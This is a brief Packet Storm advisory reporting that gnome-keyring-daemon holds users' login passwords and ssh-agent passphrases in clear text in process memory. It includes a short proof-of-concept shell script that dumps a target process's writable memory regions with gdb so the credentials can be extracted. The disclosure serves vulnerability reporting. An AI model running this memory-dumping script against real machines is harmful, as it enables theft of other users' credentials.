Gnome Keyring Daemon Credential Disclosure

Type packetstorm
Reporter Luca Ercoli
Modified 2017-04-24T00:00:00


                                            `gnome-keyring-daemon is vulnerable to local credentials disclosure.  
Fortunately the attack can be spun on already compromised machines,  
but sadly, in those cases, an attacker can leaverage on  
gnome-keyring-daemon to obtain sensible data.   
The application store  
password of logged users in clear text in the process memory, hence  
expose this information (such of login password, passphrase of  
ssh-agent, etc.) to an attacker.   
In this scenario, he can read those  
data instantly without cracking it or install keylogger, sniffer and  
variuos tools, but using gnome-keyring-daemon in order to obtain this  
informations, that can be extracted from memory using a debugger (such  
of "gdb").   
At this URL, there is a script (named "")  
that can be used as PoC:  
mkdir $1  
cd $1  
grep rw-p /proc/$1/maps \  
| awk '{print $1}' \  
| sed 's/-/ /' \  
| while read mem_start mem_end; do gdb --pid $1 --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"; done